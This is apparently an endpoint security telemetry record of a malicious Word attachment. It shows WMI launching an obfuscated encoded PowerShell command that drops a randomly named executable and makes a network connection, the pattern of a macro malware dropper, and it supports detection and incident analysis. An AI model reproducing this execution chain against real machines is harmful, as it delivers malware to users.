Peer Process: c:\program files\microsoft office\office16\winword.exe
Peer MD5: 5f48187825409cbbf797617a991ce4a4
Peer Process CLI:
"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" /n "C:\Users\UserName\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\KW7Y6LC1\Untitled-20201014-H470846.doc" /o "
Parent Process: c:\windows\system32\wbem\wmiprvse.exe
Parent MD5: 801e8003c257c8f540b20f1e0decd3a6
Process: c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process MD5: cda48fc75952ad12d99e526d0b6bf70a
Process CLI:
POwersheLL -ENCOD
Process File Write: c:\users\UserName\b20dyak\ovpqho4\v9ofyxp.exe
File MD5: 7ee4feeded88cb104448141ef375be8c
File modification count: 1
Network connection count: 1